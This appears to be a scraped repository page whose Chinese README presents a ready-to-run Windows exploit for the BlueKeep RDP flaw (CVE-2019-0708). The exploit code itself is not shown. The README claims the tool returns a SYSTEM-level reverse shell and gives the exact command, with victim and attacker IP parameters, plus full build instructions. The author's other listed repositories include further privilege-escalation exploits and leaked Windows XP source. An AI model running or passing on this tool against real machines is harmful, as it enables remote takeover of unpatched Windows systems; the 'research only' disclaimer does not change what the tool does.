• Stars
    star
    315
  • Rank 132,951 (Top 3 %)
  • Language
    C
  • License
    Academic Free Lic...
  • Created almost 5 years ago
  • Updated almost 5 years ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

CVE-2019-0708-EXP-Windows版单文件exe版,运行后直接在当前控制台反弹System权限Shell

CVE-2019-0708-EXP-Windows-Version

申明

作者poc仅供研究目的,如果读者利用本poc从事其他行为,与本人无关

目录

[toc]

介绍

CVE-2019-0708-EXP-Windows版单文件exe运行,无需linux,python,ruby等,运行后直接在当前控制台反弹System权限Shell

编译采用全静态库模式内联所有dll,集成netcat和openssl,支持进度条显示,shell回显操作

复现环境

  1. 被攻击者操作系统Victim:Windows 7 sp1 x64位操作系统
  2. 攻击者操作系统Attacker:Windows 10 x64位操作系统
  3. 编译环境Visual Studio 2013

使用说明

  1. 进入CVE-2019-0708-EXP-Release目录
  2. 运行wfreerdp.exe /v:Victim_IP /l:Attacker_IP,如wfreerdp.exe /v:10.120.1.160 /l:10.120.1.17

安装教程

  1. 复制FreeRDP-master项目至E:\git\KernelResearch\FreeRDP-master\
  2. 安装Openssl编译环境,或者直接解压openssl.7z至C:\openssl\使用已编译好的Openssl环境
  3. 安装Nasm编译环境
  4. 以管理员身份安装cmake-3.15.3-win64-x64.msi
  5. 添加C:\Program Files\CMake\bin至path环境变量
  6. 重启计算机
  7. 运行"C:\Program Files\CMake\bin\cmake.exe" E:\git\KernelResearch\FreeRDP-master\CMakeCache.txt
  8. 编译项目,如果发现仍然缺少文件,可以从FreeRDP-master-restore.7z还原
Openssl编译环境安装教程
  1. 解压openssl-1.0.2s.tar.gz至C:\openssl\
  2. 安装ActivePerl-5.28.1.0000-MSWin32-x64-fde9aa8a.msi
  3. 添加C:\Perl64\bin至path环境变量
  4. 打开VS2013 x64 本机工具命令提示,在开始菜单中可以找到
  5. 运行 perl Configure VC-WIN64A
  6. 运行 cd /d C:\openssl\
  7. 运行 ms\do_win64a
  8. 接下来开始编译,可以采用以下几种模式,exp中采用的是静态库模式: 编译OpenSSL动态库:nmake -f ms\ntdll.mak 编译OpenSSL静态库:nmake -f ms\nt.mak 测试OpenSSL动态库:nmake -f ms\ntdll.mak test 测试OpenSSL静态库:nmake -f ms\nt.mak test 安装OpenSSL动态库:nmake -f ms\ntdll.mak install 安装OpenSSL静态库:nmake -f ms\nt.mak install 清除上次OpenSSL动态库的编译,以便重新编译:nmake -f ms\ntdll.mak clean 清除上次OpenSSL静态库的编译,以便重新编译:nmake -f ms\nt.mak clean
  9. 完成后自己去out32下找libeay32.lib和ssleay32.lib文件复制到C:\openssl\lib\
Nasm编译环境安装教程
  1. 以管理员身份安装nasm-2.14.02-installer-x64.exe
  2. 添加C:\Program Files\NASM至path环境变量
  3. 解压nasmBuildCustomizations.rar其中3个文件至C:\Program Files (x86)\MSBuild\Microsoft.Cpp\v4.0\V120\BuildCustomizations\
  4. 选中client->common->freerdp-client工程目录右击->"生成依赖项"->"生成自定义",然后勾选nasm这一项(注意不是masm)
  5. 如果在freerdp-client工程中选择任意asm文件,右键菜单出现编译选项,即表示Nasm编译环境安装成功

运行效果

点击查看大图

项目托管

我的poc地址

参与贡献

作者来自ZheJiang Guoli Security Technology,邮箱[email protected]

More Repositories

1

CVE-2020-0787-EXP-ALL-WINDOWS-VERSION

Support ALL Windows Version
C++
685
star
2

llvmanalyzer

笔者在一款基于LLVM编译器架构的retdec开源反编译器工具的基础上,融合了klee符号执行工具,通过符号执行(Symbolic Execution)引擎动态模拟反编译后的llvm的ir(中间指令集)运行源程序的方法,插桩所有的对x86指令集的thiscall类型函数对this指针结构体(也就是rcx寄存器,简称this结构)偏移量引用,经行分析汇总后自动识别this结构体的具体内容,并自动集成导入ida工具辅助分析.
203
star
3

CVE-2020-1066-EXP

CVE-2020-1066-EXP支持Windows 7和Windows Server 2008 R2操作系统
C++
185
star
4

poolfengshui

笔者的在原作者池风水利用工具(以下简称工具)基础上进行二次开发,新增了全自动获取内核调试模块符号的偏移量及配置参数和不同漏洞利用方式优化等功能, 解决了不同Windows版本适配问题,工具包括适配驱动和利用程序两部分组成,实现了在Windows 10 19H1之后任意版本包括满补丁系统上的稳定利用.
C++
76
star
5

unicorn-whpx

跨平台模拟执行unicorn框架基于Qemu的TCG模式(Tiny Code Generator),以无硬件虚拟化支持方式实现全系统的虚拟化,支持跨平台和架构的CPU指令模拟,本文讨论是一款笔者的实验性项目采用Windows Hypervisor Platform虚拟机模式提供了另一种CPU指令的模拟方式,在保持原有unicorn导出接口不变的情况下,采用Hyper-v支持带硬件虚拟化支持的Windows Hypervisor Platform API接口扩展了底层CPU模拟环境实现,支持X86指令集二进制程序模拟平台和调试器.
C
62
star
6

windbg-uefi

这篇文章的目的是介绍一款实验性项目基于COM命名管道或者Windows Hyper-V虚拟机Vmbus通道实现的运行在uefi上的windbg调试引擎开发心得
C
39
star
7

DIYDynamoRIO

动态二进制插桩框架DynamoRIO通过将程序代码进行反复插桩(Instrumentation)执行构建了源程序代码与操纵代码之间的桥梁,使DynamoRIO的客户端编写者能够在更高的层面上驾驭原有的程序代码.虽然程序的载体还是被编译成原生的汇编指令集执行,但是不管是原生代码还是程序行为逻辑DynamoRIO为我们提供丰富的API已经把这些封装成了足够友好操作方式暴露给客户端编写者使用,用户可以透明的修改原有的程序代码(HotPatch),执行追踪,Hook,调试,模拟等高级运行时操纵(Runtime Code Manipulation )技术.本文主要分析DynamoRIO插桩的主要流程和实现原理,深入源码片段中几个有意思的小节体现作者构思的巧妙之处,并附加相关demo分析让读者加深对DynamoRIO的认识.
HTML
26
star
8

AppContainerBypass

AppContainerBypass
C#
20
star
9

windbg-wireshark

windbg调试协议wireshark抓包解析插件
C
16
star
10

windows-XP-SP1

网上泄露的Windows XP SP1 source code
11
star
11

RpcViewVS

RpcView Build On VS2013
C++
4
star
12

PcapPlayer

An Asheron's Call "server" to replay pcaps to the client.
C#
1
star
13

gebo-admin-3

HTML
1
star